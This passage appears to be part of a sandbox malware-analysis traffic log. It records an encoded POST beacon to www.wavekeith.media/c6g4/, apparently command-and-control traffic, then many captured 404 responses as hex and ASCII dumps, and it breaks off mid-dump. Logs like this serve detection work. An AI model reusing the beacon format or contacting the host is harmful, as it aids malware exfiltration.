                    Source: unknownHTTP traffic detected: POST /c6g4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.wavekeith.mediaContent-Length: 215Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeOrigin: http://www.wavekeith.mediaReferer: http://www.wavekeith.media/c6g4/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)Data Raw: 69 78 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 78 69 42 4c 45 77 52 74 4b 67 76 4b 45 30 41 32 50 32 39 37 70 41 4a 66 39 31 66 55 70 61 4a 65 79 31 47 65 69 45 73 5a 57 36 38 55 33 48 74 78 78 62 42 6d 50 37 2f 76 6b 72 73 74 45 2f 6e 2f 52 6b 63 74 6e 51 65 6e 4d 41 4f 77 42 45 6b 4a 68 48 2b 51 41 55 45 71 31 42 77 65 54 47 63 33 47 76 2f 4c 34 30 68 6a 5a 77 75 43 78 58 63 78 31 72 76 7a 45 43 37 2b 6e 33 30 6b 66 44 6b 4d 2b 55 71 79 68 55 72 4c 62 45 7a 63 39 70 68 78 6d 30 6f 62 59 37 35 67 45 45 6b 33 33 4b 42 6b 37 42 53 55 2f 6c 5a 59 67 63 4d 6c 44 71 38 32 69 43 74 53 54 75 36 53 57 72 59 47 35 71 53 66 5a 57 6f 79 41 3d 3d Data Ascii: ix=cPxsRdouMH6olxiBLEwRtKgvKE0A2P297pAJf91fUpaJey1GeiEsZW68U3HtxxbBmP7/vkrstE/n/RkctnQenMAOwBEkJhH+QAUEq1BweTGc3Gv/L40hjZwuCxXcx1rvzEC7+n30kfDkM+UqyhUrLbEzc9phxm0obY75gEEk33KBk7BSU/lZYgcMlDq82iCtSTu6SWrYG5qSfZWoyA==
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 14 Apr 2025 21:18:58 GMTContent-Type: text/plainContent-Length: 0Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:19:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:19:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:19:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:19:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:19:50 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:19:53 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:19:56 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:19:59 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:20:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kmuBsHpqsGaomDUH8AbbvyRl0Gk8RV4m3mMm4o4YSK3mHomWWGVnCV%2BICES7RkXuDocZNMu%2BFPILbqwKbewyk59XBqXIUaLP%2Bj2k4eLPSZ2hEstFfLFlTv67jUbFSDw7Df5TTKGSNBf%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063ef01d178db5-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121700&min_rtt=121700&rtt_var=60850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=749&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:20:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o3083VJbqSL5iICzzXjxneKFLCjsD81RvG61b76coJgb%2BMN2Zcdp4V4FiqSPfRZ%2FVQR9I%2BTyvfRsH0VwBO9fC7fVl2e6mkJXiNEwhbP7F4ae7OV0WT8DroVw%2BG%2FLzrjbxmSQeBVuxTaO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063f06bde88da3-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121868&min_rtt=121868&rtt_var=60934&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:20:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHFSdW19aDjtc6zDSyvHrTjJAHTW06gRlfaV6sl5nJic3MOTtxx4k%2FNO6rIiOgBOQKDUXkObyDZ5zDTRuNo7kuXe4kzl%2F0%2BTOcIdTHpHTVGZJabaPW0puAeAUDR3LpELaloOEJ6t34PF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93063f175f344f21-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121391&min_rtt=121391&rtt_var=60695&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 